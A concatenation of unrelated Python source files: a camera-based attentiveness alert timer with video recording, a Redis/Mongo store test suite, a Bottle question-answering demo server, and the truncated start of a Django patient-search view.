int(entry['top']),
int(entry['width']),
int(entry['height']))
self.stats.append_player(player)
self.stats.thread_count -= 1
def __update_players_text(self, frame, count: int):
frame_height, frame_width, _ = frame.shape
players = f'Players Observed: {self.stats.get_last_players(count)}'
position = (10, frame_height - 170)
font = cv2.QT_FONT_NORMAL
font_scale = 1
font_color = (0, 0, 255)
font_thickness = 3
cv2.putText(frame, players, position, font, font_scale, font_color, font_thickness)
def __update_players_rect(self, frame):
players_positions = self.stats.get_players_position()
for player_position in players_positions:
left = player_position[0]
top = player_position[1]
width = player_position[2]
height = player_position[3]
cv2.rectangle(frame, (left, top), (left + width, top + height), (0, 0, 255), 2)
|
Timer_rai.py
|
# Copyright (C) 2020 by ZestIOT. All rights reserved. The information in this
# document is the property of ZestIOT. Except as specifically authorized in
# writing by ZestIOT, the receiver of this document shall keep the information
# contained herein confidential and shall protect the same in whole or in part from
# disclosure and dissemination to third parties. Disclosure and disseminations to
# the receiver's employees shall only be made on a strict need to know basis.
"""
timer function
Input: algo(which event is being considered Person in ROI, view direction, motion of the person),
flag(if the event is true in the particular frame or not), cam(cv2 camera feed object)
variables: Pdetect(it increments when flag is true in the frame),Pcheck(flag to start buffer time when flag is False),
Ptimer(flag to start Actual Alert timer),Pst_time(start time for buffer time),Ptrigger(start time for Alert Timer).
Palert_frame(number of false positives to be considered before resetting the Timer),
Palert_time(duration of the timer),Pflag(if the erue or false for the particular frame)
Note: variables are similar for all three events
User Requirements:
1} Start Timer and Raise Alarm when person is not attentive.
Requirements:
1) check if the flag is true or false for the given event/algo
2) If the flag is false for continuosly for buffer time(2 seconds or more) then initiate the timer
3) I fthe flag is still false for the Timer period(Palert_time) than we call the event function
4) In between if the person comes back then we restart the process
Start_video function
Input: event name and cam (cv2 camera feed object),
variable: vid_path(path of the video on device to sent with event api call),
Requirement:
1) start saving camera feed into a video when timer has started for any event upto video duration time
event_call function
Input: event name
Requirements
1) it create a Clientsocket object with unique device id
2) sends the Event information with Timestamp and the path of the video to the Pi device
video_trigger function
Input: cam(cv2 camera feed object)
Requirements:
1)It checks if the Timer for any event Alert has been started.
2) Checks if a folder has been created for today or not.
3) If not it creates a folder
4) if the Timer has started then it create a thread for saving a video(Start_video)
"""
from datetime import datetime,timedelta
from sockets import ClientSocket
import json
import cv2
from threading import Thread
import error
import shutil
import time
import os
er =0
config1="/home/smartcow/BPCL/BPCL_final/UI_parameters.json"
config="/home/smartcow/BPCL/BPCL_final/BPCL_config.json"
with open(config) as json_data:
info=json.load(json_data)
Palert_frame,Dalert_frame,Malert_frame= info["Palert_frame"],info["Dalert_frame"],info['Malert_frame']
event_file,gpu_path,temp_folder = info["event_file"],info["gpu_path"],info["temp_folder"]
with open(config1) as json_data:
info =json.load(json_data)
Palert_time,Dalert_time=int(info["Person_ROI_unavailable"]), int(info["Person_not_attentive"])
Roi_rectify,attentive_rectify=int(info["Person_ROI_rectify"]),int(info["Person_attentive_rectify"])
Malert_time=Dalert_time
print("Palert -> ", Palert_time, Dalert_time, Malert_time)
Ptimer,Pdetect,Pcheck,Pst_time,Ptrigger,Prectify,Pback,Pfp_time,Pvideo,Ppath,Pvend_time = 0,0,0,0,0,0,0,0,0,0,0
Dtimer,Ddetect,Dcheck,Dst_time,Dtrigger,Drectify,Dback,Dfp_time,Dvideo,Dpath,Dvend_time = 0,0,0,0,0,0,0,0,0,0,0
Mtimer,Mdetect,Mcheck,Mst_time,Mtrigger,Mrectify,Mback,Mfp_time,Mvideo,Mpath,Mvend_time = 0,0,0,0,0,0,0,0,0,0,0
vid_path="/media/smartcow/LFS/"
video_flag =0
temp_file="/media/smartcow/LFS/"
fourcc = cv2.VideoWriter_fourcc(*'XVID')
def start_video(event):
global Pvideo,Mvideo,Dvideo,Ppath,Dpath,Mpath,Pevent_out,Mevent_out,Devent_out,Pvend_time,Mvend_time,Dvend_time,Palert_time,Dalert_time,Malert_time
vid_dir=(datetime.now()).strftime("%Y_%m_%d")
loc=gpu_path+vid_dir+"/"
if not os.path.isdir(loc):
#print("make directory")
os.mkdir(loc)
if event == "EVENT21_ON":
description = "PERSON_NOT_IN_ROI"
elif event == "EVENT22_ON" or event == "EVENT23_ON":
description = "PERSON_NOT_ATTENTIVE"
vid_name="RAIPUR_BPCL_NX1_"+description+"_"+event+"_"+(datetime.now()).strftime("%Y-%m-%dT%H-%M-%S")+".avi"
if event == "EVENT21_ON":
Ppath = loc+vid_name
Pvideo = temp_folder+vid_name
Pevent_out=cv2.VideoWriter(Pvideo,fourcc, 3, (1280,720), True)
Pvend_time=datetime.now()+timedelta(seconds=Palert_time)
elif event == "EVENT22_ON":
Dpath = loc+vid_name
Dvideo = temp_folder+vid_name
Devent_out=cv2.VideoWriter(Dvideo,fourcc, 3, (1280,720), True)
Dvend_time=datetime.now()+timedelta(seconds=Dalert_time)
elif event == "EVENT23_ON":
Mpath = loc+vid_name
Mvideo = temp_folder+vid_name
Mevent_out=cv2.VideoWriter(Mvideo,fourcc, 3, (1280,720), True)
Mvend_time=datetime.now()+timedelta(seconds=Malert_time)
def video_function(event,cam):
global Pvend_time,Dvend_time,Mvend_time,Ptimer,Dtimer,Mtimer,Pevent_out,Devent_out,Mevent_out
while True:
if (Dtimer > 0 or Mtimer > 0 or Ptimer >0):
img = cam.get_frame()
#print (img)
#cv2.imwrite("check.jpg",img)
img = cv2.resize(img,(1280,720))
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 50] # Giving required quility
result, encimg = cv2.imencode('.jpg',img, encode_param) #Encoding frame
img = cv2.imdecode(encimg, 1)
ls_time = datetime.now()
#print (Pvend_time)
if Pvend_time != 0:
if datetime.now()>Pvend_time:
#print ("******************* breaking **********************")
Pvend_time=0
Pevent_out.release()
Pevent_out.write(img)
#print("&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&writen&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&")
if Dvend_time != 0:
if datetime.now()>Dvend_time:
Dvend_time = 0
Devent_out.release()
Devent_out.write(img)
if Mvend_time != 0:
if datetime.now()>Mvend_time:
Mvend_time=0
Mevent_out.release()
Mevent_out.write(img)
le_time = datetime.now()
while(int((le_time -ls_time).total_seconds()*1000) < 300 ):
le_time = datetime.now()
def event_call(event,temp,path):
global er
try:
sc=ClientSocket(device_id=str('BPCL_RAI_NX_0001'))
except Exception as e:
print("Client socket error")
er=er+1
if er < 4:
time.sleep(1)
event_call(event,path)
error.raised("3",str(e))
try:
logdate=(datetime.now()).strftime("%Y-%m-%d %H:%M:%S")
#print("video Path {}".format(vid_path))
if path == None:
if event == "Reset":
data={'event_time':logdate,'event_description':"Reset function"}
elif event == "EVENT21_OFF":
data={'event_time':logdate,'event_description':"Person not in ROI Rectified"}
elif event == "EVENT22_OFF" or event == "EVENT23_OFF":
data={'event_time':logdate,'event_description':"Person not attentive Rectified"}
else:
shutil.move(temp,path)
print("file moved from {} to {}".format(temp,path))
if event == "EVENT21_ON":
data={'event_time':logdate,'path':path,'event_description':"Person not in ROI"}
elif event == "EVENT22_ON" or event == "EVENT23_ON":
data={'event_time':logdate,'path':path,'event_description':"Person not attentive"}
print(data)
if event == "Reset":
event = "EVENT21_OFF"
sc.send(time_stamp=logdate, message_type=event, data=data)
msg = sc.receive()
print(msg)
if int(msg["data"]["status"]) == 200:
print("API success")
else:
print("API failed please check")
error.raised("3","API failed")
except Exception as e:
print("error in event_call function")
error.raised("3",str(e))
def timer(algo,flag,cam):
try:
global Pvideo,Mvideo,Dvideo,Ppath,Dpath,Mpath,Pfp_time,Mfp_time,Dfp_time,Prectify,Drectify,Mrectify,Pback,Mback,Dback,vid_path,Ptimer,Pdetect,Palert_frame,Palert_time,Pcheck,Pst_time,Ptrigger, Dtimer,Ddetect,Dcheck,Dst_time,Dtrigger,Dalert_frame,Dalert_time,Mtimer,Mdetect,Mcheck,Mst_time,Mtrigger,Malert_frame,Malert_time
if algo == "person" :
Pflag = flag
if Pflag == True:
print("person pflag",Pflag,Ptimer,Pdetect, Palert_frame)
Pcheck = 0
Pdetect = Pdetect +1
if Ptimer != 0 and Pdetect > Palert_frame:
if Ptimer ==1:
Ptimer=0
if Mtimer ==1:
Mtimer=0
if Dtimer==1:
Dtimer=0
if Ptimer == 2 and Pback ==0:
Prectify =datetime.now()
#Ptimer=0
Pback =1
print("AFter Ptimer2",Pdetect, Ptimer)
if Pback == 1 and datetime.now() > Prectify + timedelta(seconds=Roi_rectify):
with open(event_file,'w') as efile:
efile.write("EVENT21_OFF :: "+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("EVENT21_OFF",None,None)
current_time = datetime.now()
current_time = str(current_time)[10:]
print("********* Rectification!!! Person in ROI ******* Time : " , current_time)
Ptimer=0
else:
print("ptimer",Ptimer,Pcheck,Pdetect, Palert_frame)
if Pcheck == 0 and Ptimer == 0:
Pst_time =datetime.now()
Pcheck = 1
if datetime.now() > Pst_time + timedelta(seconds=3) and Ptimer == 0 and Pcheck == 1:
Pflag = False
if Mtimer == 1:
Mtimer =0
if Dtimer == 1:
Dtimer =0
Ptimer=1
Pback=0
video_trigger(cam,"EVENT21_ON")
Pdetect=0
Ptrigger=datetime.now()
Pfp_time=datetime.now()
current_time = datetime.now()
current_time = str(current_time)[10:]
print("*********** Person Timer Started ******* Time : ", current_time)
elif Ptimer ==1 and Pdetect <= Palert_frame and datetime.now() > Ptrigger + timedelta(seconds=Palert_time):
with open(event_file,'w') as efile:
#efile.write("EVENT21_OFF",(datetime.now()).strftime("%Y_%m_%dT%H-%M-%S"))
efile.write("EVENT21_ON :: "+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("EVENT21_ON",Pvideo,Ppath)
Pfp_time=datetime.now()
current_time = datetime.now()
current_time = str(current_time)[10:]
print("********* ALERT!!! Person not in ROI ******* Time : " , current_time)
Ptimer = 2
Dtimer,Mtimer = 0,0
elif Ptimer != 0 and datetime.now() > Pfp_time + timedelta(seconds=5):
Pdetect=0
Pfp_time=datetime.now()
if algo == "direction":
Dflag = flag
if Dflag ==True:
Dcheck = 0
Ddetect = Ddetect +1
if Dtimer != 0 and Ddetect > Dalert_frame:
if Dtimer ==1:
Dtimer=0
if Mtimer ==1:
Mtimer=0
elif Dtimer == 2 and Dback==0:
Dback=1
Drectify=datetime.now()
#Dtimer=0
elif Dback ==1 and datetime.now() > Drectify +timedelta(seconds=attentive_rectify):
with open(event_file,'w') as efile:
efile.write("EVENT22_OFF :: "+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("EVENT22_OFF",None,None)
current_time = datetime.now()
current_time = str(current_time)[10:]
print("********* Rectification!!! Person is attentive ******* Time : " , current_time)
Dtimer = 0
else:
if Dcheck == 0 and Dtimer == 0:
Dst_time =datetime.now()
Dcheck = 1
if datetime.now() > Dst_time + timedelta(seconds=3) and Dtimer == 0 and Dcheck == 1:
flag = False
if Mtimer == 1:
Mtimer=0
Dtimer=1
Dback=0
video_trigger(cam,"EVENT22_ON")
Ddetect=0
Dtrigger=datetime.now()
Dfp_time=datetime.now()
current_time = datetime.now()
current_time = str(current_time)[10:]
print("*********** Direction Timer Started ***** Time : ", current_time)
elif Dtimer ==1 and Ddetect <= Dalert_frame and datetime.now() > Dtrigger + timedelta(seconds=Dalert_time):
with open(event_file,'w') as efile:
#efile.write("EVENT22_OFF",(datetime.now()).strftime("%Y_%m_%dT%H-%M-%S"))
efile.write("EVENT22_ON :: "+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("EVENT22_ON",Dvideo,Dpath)
Dfp_time=datetime.now()
current_time = datetime.now()
current_time = str(current_time)[10:]
print("********* ALERT!!! not looking in that direction ***** Time : ", current_time)
Dtimer = 2
Mtimer = 0
elif Dtimer != 0 and datetime.now() > Dfp_time + timedelta(seconds=5):
Ddetect=0
Dfp_time = datetime.now()
if algo == "motion":
Mflag = flag
if Mflag == True:
Mcheck = 0
Mdetect = Mdetect +1
if Mtimer != 0 and Mdetect > Malert_frame:
if Mtimer == 1:
Mtimer=0
elif Mtimer == 2 and Mback==0:
Mback =1
Mrectify=datetime.now()
#Mtimer=0
elif Mback ==1 and datetime.now() > Mrectify +timedelta(seconds=4):
with open(event_file,'w') as efile:
efile.write("EVENT23_OFF :: "+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("EVENT23_OFF",None,None)
current_time = datetime.now()
current_time = str(current_time)[10:]
print("********* Rectification!!! Person is attentive ******* Time : " , current_time)
Mtimer = 0
else:
if Mcheck == 0 and Mtimer == 0:
Mst_time =datetime.now()
Mcheck = 1
if datetime.now() > Mst_time + timedelta(seconds=3) and Mtimer == 0 and Mcheck == 1:
flag = False
Mtimer=1
Mback=0
video_trigger(cam,"EVENT23_ON")
Mdetect=0
Mtrigger=datetime.now()
Mfp_time=datetime.now()
current_time = datetime.now()
current_time = str(current_time)[10:]
print("*********** Motion Timer Started *** Time : ", current_time)
elif Mtimer ==1 and Mdetect <= Malert_frame and datetime.now() > Mtrigger + timedelta(seconds=Malert_time):
with open(event_file,'w') as efile:
#efile.write("EVENT23_OFF",(datetime.now()).strftime("%Y_%m_%dT%H-%M-%S"))
efile.write("EVENT23_ON :: "+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("EVENT23_ON",Mvideo,Mpath)
Mfp_time=datetime.now()
current_time = datetime.now()
current_time = str(current_time)[10:]
print("********* ALERT!!! Motion is not detected *** Time :", current_time)
Mtimer = 2
elif Mtimer != 0 and datetime.now() > Mfp_time + timedelta(seconds=5):
Mdetect=0
Mfp_time=datetime.now()
except Exception as e:
print (str(e),"error in timer")
error.raised("7",str(e))
def video_trigger(cam,event):
global video_flag
try:
start_video(event)
time.sleep(1)
if video_flag == 0:
video=Thread(target=video_function,args=(event,cam))
video.start()
video_flag =1
except Exception as e:
print (str(e),"error in timer")
error.raised("7",str(e))
def reset():
global Ptimer,Mtimer,Dtimer
print("Resetting timers in reset")
with open(event_file, 'w') as efile:
efile.write("EVENT_ALL_OFF ::"+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("Reset",None,None)
Ptimer,Dtimer,Mtimer=0,0,0
|
test_store.py
|
# Unit test suite for the RedisStore class.
# This test suite now runs in its own docker container. To build the image, run
# docker build -f Dockerfile-test -t abaco/testsuite .
# from within the tests directory.
#
# To run the tests execute, first start the development stack using:
# 1. export abaco_path=$(pwd)
# 2. docker-compose -f docker-compose-local-db.yml up -d (from within the root directory)
# 3. docker-compose -f docker-compose-local.yml up -d (from within the root directory)
# Then, also from the root directory, execute:
# docker run -e base_url=http://172.17.0.1:8000 -v $(pwd)/local-dev.conf:/etc/abaco.conf --entrypoint=py.test -it --rm jstubbs/abaco_testsuite /tests/test_store.py
from _datetime import datetime
import pytest
import os
import sys
import threading
import time
import timeit
sys.path.append(os.path.split(os.getcwd())[0])
sys.path.append('/actors')
from config import Config
from store import RedisStore, MongoStore
# this is the store to test
store = os.environ.get('store', 'redis')
# this is the number of iterations executed in each thread, per test.
n = 500
@pytest.fixture(scope='session')
def st():
if store == 'redis':
rs = RedisStore(Config.get('store', 'redis_host'), Config.getint('store', 'redis_port'), db='11')
# override the configured expiration time
rs.ex = 1
return rs
else:
ms = MongoStore(Config.get('store', 'mongo_host'), Config.getint('store', 'mongo_port'), db='11')
# we want to recreate the index each time so we start off trying to drop it, but the first time we run
# after the db is instantiated the index won't exist.
try:
ms._db.drop_index('exp_1')
except Exception:
pass
ms._db.create_index('exp', expireAfterSeconds=1)
return ms
def test_set_key(st):
st['test'] = 'val'
assert st.get('test') == 'val'
def test_set_with_expiry(st):
st.set_with_expiry('test_exp', 'val')
assert st.get('test_exp') == 'val'
# in our tests, the mongo expiry functionality is NOT dependable; it seems to eventually remove the key but the time
# it takes seems to fluctuate. for mongo, we'll test at the end of the suite to make sure the key is removed.
if store == 'redis':
time.sleep(1)
with pytest.raises(KeyError):
st['test_exp']
def _thread(st, n):
for i in range(n):
st.update('test', 'k2', 'w{}'.format(i))
def test_update(st):
st['test'] = {'k': 'v',
'k2': 'v2'}
t = threading.Thread(target=_thread, args=(st, n))
t.start()
for i in range(n):
st.update('test', 'k', 'v{}'.format(i))
t.join()
assert st['test'] == {'k': 'v{}'.format(n-1), 'k2': 'w{}'.format(n-1)}
def test_pop_field(st):
st['test'] = {'k': 'v', 'k2': 'v2', 'key': 'val'}
# this is the naive functionality we want; of course, this is not thread safe:
cur = st['test']
val = cur.pop('key')
st['test'] = cur
assert val == 'val'
assert st['test'] == {'k': 'v', 'k2': 'v2'}
# here's the non-threaded test:
st['test'] = {'k': 'v', 'k2': 'v2', 'key': 'val'}
assert st['test']['key'] == 'val'
val = st.pop_field('test', 'key')
assert val == 'val'
assert not type(st['test']) == str
# and finally, a threaded test:
st['test'] = {'k': 'v', 'k2': 'v2'}
for i in range(n):
st.update('test', 'key{}'.format(i), 'v{}'.format(i))
st['test']['key0'] = 'v0'
assert st['test']['key0'] == 'v0'
assert st['test']['key{}'.format(n-1)] == 'v{}'.format(n-1)
t = threading.Thread(target=_thread, args=(st, n))
t.start()
for i in range(n):
val = st.pop_field('test', 'key{}'.format(i))
assert val == 'v{}'.format(i)
t.join()
assert st['test'] == {'k': 'v', 'k2': 'w{}'.format(n-1)}
def test_update_subfield(st):
st['test'] = {'k': {'sub': 'v'},
'k2': 'v2'}
t = threading.Thread(target=_thread, args=(st, n))
t.start()
for i in range(n):
st.update_subfield('test', 'k', 'sub', 'v{}'.format(i))
t.join()
assert st['test'] == {'k': {'sub': 'v{}'.format(n-1)}, 'k2': 'w{}'.format(n-1)}
def test_getset(st):
st['test'] = {'k': 'v',
'k2': 'v2'}
st['k'] = 'v0'
t = threading.Thread(target=_thread, args=(st, n))
t.start()
for i in range(n):
v = st.getset('k', 'v{}'.format(i))
if i ==0:
assert v == 'v0'
else:
assert v == 'v{}'.format(i-1)
t.join()
assert st['test'] == {'k': 'v', 'k2': 'w{}'.format(n-1)}
assert st['k'] == 'v{}'.format(n-1)
def test_within_transaction(st):
# mongo store does not support within_transaction
if not store == 'redis':
return
def _th():
"""A separate thread that is going to compete with the main thread to make updates on the key."""
assert st['k'] == 'v'
time.sleep(1)
# try to update the value of 'k'; this should take a while since the other thread has a lock
start = timeit.default_timer()
st['k'] = 'v2'
stop = timeit.default_timer()
assert st['k'] == 'v2'
tot = stop - start
assert tot > 2.0
def _transaction(val):
"""Represents business logic that should be wrapped in a transaction."""
# make sure we are passed the value
assert val == 'v'
# also, get the key and assert the original value
assert st['k'] == 'v'
# now sleep some time
time.sleep(3)
# now, update the key:
st['k'] = 'foo'
assert st['k'] == 'foo'
st['k'] = 'v'
# first start a new thread that will sleep for 1 second before trying to change the value
t = threading.Thread(target=_th)
t.start()
# now, start a transaction in the main thread:
st.within_transaction(_transaction, 'k')
def test_set_with_expiry2(st):
# in our tests, the mongo expiry functionality is NOT dependable; it seems to eventually remove the key but the time
# it takes seems to fluctuate. for mongo, we'll test at the end of the suite to make sure the key is removed.
tot = 0
while tot < 5:
try:
st['test_exp']
except KeyError:
return
tot += 1
time.sleep(2)
|
demo.py
|
#!/usr/bin/env python
# coding=utf-8
import tensorflow as tf
import bottle
from bottle import route, run
import threading
import json
import numpy as np
from prepro import convert_to_features, word_tokenize
from time import sleep
import math
'''
This file is taken and modified from R-Net by Minsangkim142
https://github.com/minsangkim142/R-net
'''
app = bottle.Bottle()
query = []
response = ""
@app.get("/")
def home():
with open('demo.html', 'r') as fl:
html = fl.read()
return html
@app.post('/answer')
def answer():
passage = bottle.request.json['passage']
question = bottle.request.json['question']
print("received question: {}".format(question))
# if not passage or not question:
# exit()
global query, response
query = (passage, question)
while not response:
sleep(0.1)
print("received response: {}".format(response))
response_ = {"answer": response}
response = []
return response_
class Demo(object):
def __init__(self, model, config):
run_event = threading.Event()
run_event.set()
threading.Thread(target=self.demo_backend, args = [model, config, run_event]).start()
app.run(port=8080, host='0.0.0.0')
try:
while 1:
sleep(.1)
except KeyboardInterrupt:
print("Closing server...")
run_event.clear()
def demo_backend(self, model, config, run_event):
global query, response
with open(config.word_dictionary, "r") as fh:
word_dictionary = json.load(fh)
with open(config.char_dictionary, "r") as fh:
char_dictionary = json.load(fh)
sess_config = tf.ConfigProto(allow_soft_placement=True)
sess_config.gpu_options.allow_growth = True
with model.graph.as_default():
with tf.Session(config=sess_config) as sess:
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver()
saver.restore(sess, tf.train.latest_checkpoint(config.save_dir))
if config.decay < 1.0:
sess.run(model.assign_vars)
while run_event.is_set():
sleep(0.1)
if query:
context = word_tokenize(query[0].replace("''", '" ').replace("``", '" '))
c,ch,q,qh = convert_to_features(config, query, word_dictionary, char_dictionary)
fd = {'context:0': [c],
'question:0': [q],
'context_char:0': [ch],
'question_char:0': [qh]}
yp1,yp2, logits1, logits2 = sess.run([model.yp1, model.yp2, model.logits1, model.logits2], feed_dict = fd)
log_prob1 = logits1[0][yp1[0]]
log_prob2 = logits2[0][yp2[0]]
score1 = 1/(1+math.exp(-log_prob1))
score2 = 1/(1+math.exp(-log_prob2))
print("SV Confidence: ", score1, "EV Confidence: ", score2)
yp2[0] += 1
response = " ".join(context[yp1[0]:yp2[0]])
query = []
|
views.py
|
import datetime
import logging
import re
import threading
from typing import Optional, List
import pytz
import simplejson as json
from django.contrib.auth.decorators import login_required
from laboratory.decorators import group_required
from django.core.exceptions import ValidationError
from django.db import transaction, connections
from django.db.models import Prefetch, Q
from django.forms import model_to_dict
from django.http import JsonResponse
from api import sql_func
from appconf.manager import SettingManager
from clients.models import (
CardBase,
Individual,
Card,
Document,
DocumentType,
District,
AnamnesisHistory,
DispensaryReg,
CardDocUsage,
BenefitReg,
BenefitType,
VaccineReg,
Phones,
AmbulatoryData,
AmbulatoryDataHistory,
DispensaryRegPlans, ScreeningRegPlan,
)
from contracts.models import Company
from directions.models import Issledovaniya
from directory.models import Researches
from laboratory import settings
from laboratory.utils import strdate, start_end_year, localtime
from rmis_integration.client import Client
from slog.models import Log
from statistics_tickets.models import VisitPurpose
from tfoms.integration import match_enp, match_patient
from directory.models import DispensaryPlan
from utils.data_verification import data_parse
logger = logging.getLogger(__name__)
def full_patient_search_data(p, query):
dp = re.compile(r'^[0-9]{2}\.[0-9]{2}\.[0-9]{4}$')
split = str(re.sub(' +', ' ', str(query))).split()
n = p = ""
f = split[0]
rmis_req = {"surname": f + "%"}
if len(split) > 1:
n = split[1]
rmis_req["name"] = n + "%"
if len(split) > 2:
if re.search(dp, split[2]):
split = [split[0], split[1], '', split[2]]
else:
p = split[2]
rmis_req["patrName"] = p + "%"
if len(split) > 3:
if '.' in split[3]:
btday = split[3].split(".")
elif len(split[3]) == 8 and split[3].isdigit():
btday = [split[3][0:2], split[3][2:4], split[3][4:8]]
else:
btday = None
if btday:
btday = btday[2] + "-" + btday[1] + "-" + btday[0]
rmis_req["birthDate"] = btday
return f, n, p, rmis_req, split
@login_required
def patients_search_card(request):
objects = []
data = []
d = json.loads(request.body)
inc_rmis = d.get('inc_rmis')
always_phone_search = d.get('always_phone_search')
tfoms_module = SettingManager.l2('tfoms')
birthday_order = SettingManager.l2('birthday_order')
inc_tfoms = d.get('inc_tfoms') and tfoms_module
card_type = CardBase.objects.get(pk=d['type'])
query = d.get('query', '').strip()
suggests = d.get('suggests', False)
extended_search = d.get('extendedSearch', False)
limit = min(int(d.get('limit', 10)), 20)
form = d.get('form', {})
p = re.compile(r'^[а-яё]{3}[0-9]{8}$', re.IGNORECASE)
p2 = re.compile(r'^([А-яЁё\-]+)( ([А-яЁё\-]+)(( ([А-яЁё\-]*))?( ([0-9]{2}\.?[0-9]{2}\.?[0-9]{4}))?)?)?$')
p_tfoms = re.compile(r'^([А-яЁё\-]+) ([А-яЁё\-]+)( ([А-яЁё\-]+))? (([0-9]{2})\.?([0-9]{2})\.?([0-9]{4}))$')
p3 = re.compile(r'^[0-9]{1,15}$')
p_enp_re = re.compile(r'^[0-9]{16}$')
p_enp = bool(re.search(p_enp_re, query))
p4 = re.compile(r'card_pk:\d+(:(true|false))?', flags=re.IGNORECASE)
p4i = bool(re.search(p4, query.lower()))
p5 = re.compile(r'phone:.+')
p5i = bool(re.search(p5, query))
pat_bd = re.compile(r"\d{4}-\d{2}-\d{2}")
c = None
has_phone_search = False
inc_archive = form and form.get('archive', False)
if extended_search and form:
q = {}
family = str(form.get('family', ''))
if family:
q['family__istartswith'] = family
name = str(form.get('name', ''))
if name:
q['name__istartswith'] = name
patronymic = str(form.get('patronymic', ''))
if patronymic:
q['patronymic__istartswith'] = patronymic
birthday = str(form.get('birthday', ''))
if birthday:
birthday_parts = birthday.split('.')
if len(birthday_parts) == 3:
if birthday_parts[0].isdigit():
q['birthday__day'] = int(birthday_parts[0])
if birthday_parts[1].isdigit():
q['birthday__month'] = int(birthday_parts[1])
if birthday_parts[2].isdigit():
q['birthday__year'] = int(birthday_parts[2])
objects = Individual.objects.all()
if q:
objects = objects.filter(**q)
enp_s = str(form.get('enp_s', ''))
enp_n = str(form.get('enp_n', ''))
if enp_n:
if enp_s:
objects = objects.filter(document__serial=enp_s, document__number=enp_s, document__document_type__title='Полис ОМС')
else:
objects = objects.filter(document__number=enp_n, document__document_type__title='Полис ОМС')
pass_s = str(form.get('pass_s', ''))
pass_n = str(form.get('pass_n', ''))
if pass_n:
objects = objects.filter(document__serial=pass_s, document__number=pass_n, document__document_type__title='Паспорт гражданина РФ')
snils = str(form.get('snils', ''))
if pass_n:
objects = objects.filter(document__number=snils, document__document_type__title='СНИЛС')
medbook_number = str(form.get('medbookNumber', ''))
if medbook_number and SettingManager.l2('profcenter'):
objects = objects.filter(card__medbook_number=medbook_number)
phone = str(form.get('phone', ''))
if phone:
normalized_phones = Phones.normalize_to_search(phone)
if normalized_phones:
objects = objects.filter(
Q(card__phones__normalized_number__in=normalized_phones) |
Q(card__phones__number__in=normalized_phones) |
Q(card__phone__in=normalized_phones) |
Q(card__doctorcall__phone__in=normalized_phones)
)
elif p5i or (always_phone_search and len(query) == 11 and query.isdigit()):
has_phone_search = True
phone = query.replace('phone:', '')
normalized_phones = Phones.normalize_to_search(phone)
objects = list(Individual.objects.filter(
Q(card__phones__normalized_number__in=normalized_phones) |
Q(card__phones__number__in=normalized_phones) |
Q(card__phone__in=normalized_phones) |
Q(card__doctorcall__phone__in=normalized_phones)
))
elif p_enp:
if tfoms_module and not suggests:
from_tfoms = match_enp(query)
if from_tfoms and isinstance(from_tfoms, dict):
Individual.import_from_tfoms(from_tfoms)
objects = list(Individual.objects.filter(document__number=query, document__document_type__title='Полис ОМС'))
elif not p4i:
if inc_tfoms:
t_parts = re.search(p_tfoms, query.lower()).groups()
t_bd = "{}-{}-{}".format(t_parts[7], t_parts[6], t_parts[5])
from_tfoms = match_patient(t_parts[0], t_parts[1], t_parts[2], t_bd)
if isinstance(from_tfoms, list):
for t_row in from_tfoms:
if isinstance(t_row, dict):
Individual.import_from_tfoms(t_row, no_update=True)
if re.search(p, query.lower()):
initials = query[0:3].upper()
btday = query[7:11] + "-" + query[5:7] + "-" + query[3:5]
if not pat_bd.match(btday):
return JsonResponse([], safe=False)
try:
objects = list(
Individual.objects.filter(family__startswith=initials[0], name__startswith=initials[1], patronymic__startswith=initials[2], birthday=btday, card__base=card_type)
)
if ((card_type.is_rmis and len(objects) == 0) or (card_type.internal_type and inc_rmis)) and not suggests:
c = Client(modules="patients")
objects += c.patients.import_individual_to_base({"surname": query[0] + "%", "name": query[1] + "%", "patrName": query[2] + "%", "birthDate": btday}, fio=True)
except Exception as e:
logger.exception(e)
elif re.search(p2, query):
f, n, p, rmis_req, split = full_patient_search_data(p, query)
if len(split) > 3 or (len(split) == 3 and split[-1].isdigit()):
sbd = split[-1]
if len(sbd) == 8:
sbd = "{}.{}.{}".format(sbd[0:2], sbd[2:4], sbd[4:8])
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, card__base=card_type, birthday=datetime.datetime.strptime(sbd, "%d.%m.%Y").date())
if len(split) > 3:
objects.filter(patronymic__istartswith=p)
objects = objects[:10]
else:
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, patronymic__istartswith=p, card__base=card_type)[:10]
if ((card_type.is_rmis and (len(objects) == 0 or (len(split) < 4 and len(objects) < 10))) or (card_type.internal_type and inc_rmis)) and not suggests:
objects = list(objects)
try:
if not c:
c = Client(modules="patients")
objects += c.patients.import_individual_to_base(rmis_req, fio=True, limit=10 - len(objects))
except Exception as e:
logger.exception(e)
if (
(re.search(p3, query) and not card_type.is_rmis)
or (len(objects) == 0 and len(query) == 16 and not p_enp and card_type.internal_type)
or (card_type.is_rmis and not re.search(p3, query))
):
resync = True
if len(objects) == 0:
resync = False
try:
objects = Individual.objects.filter(card__number=query.upper(), card__base=card_type)
if not inc_archive:
objects = objects.filter(card__is_archive=False)
objects = list(objects)
if (card_type.is_rmis or card_type.internal_type) and len(objects) == 0 and len(query) == 16 and not suggests:
if not c:
c = Client(modules="patients")
objects += c.patients.import_individual_to_base(query)
elif not suggests:
resync = True
except Exception as e:
logger.exception(e)
if resync and card_type.is_rmis and not suggests:
if not c:
c = Client(modules="patients")
sema = threading.BoundedSemaphore(10)
threads = list()
def sync_i(ind_local: Individual, client: Client):
sema.acquire()
try:
ind_local.sync_with_rmis(c=client)
finally:
sema.release()
try:
connections.close_all()
logger.exception("Closed db connections")
except Exception as e:
logger.exception(f"Error closing connections {e}")
for obj in objects:
thread = threading.Thread(target=sync_i, args=(obj, c))
threads.append(thread)
thread.start()
if p4i:
parts = query.split(":")
cards = Card.objects.filter(pk=int(parts[1]))
inc_archive = inc_archive or (len(parts) > 2 and parts[2] == 'true')
else:
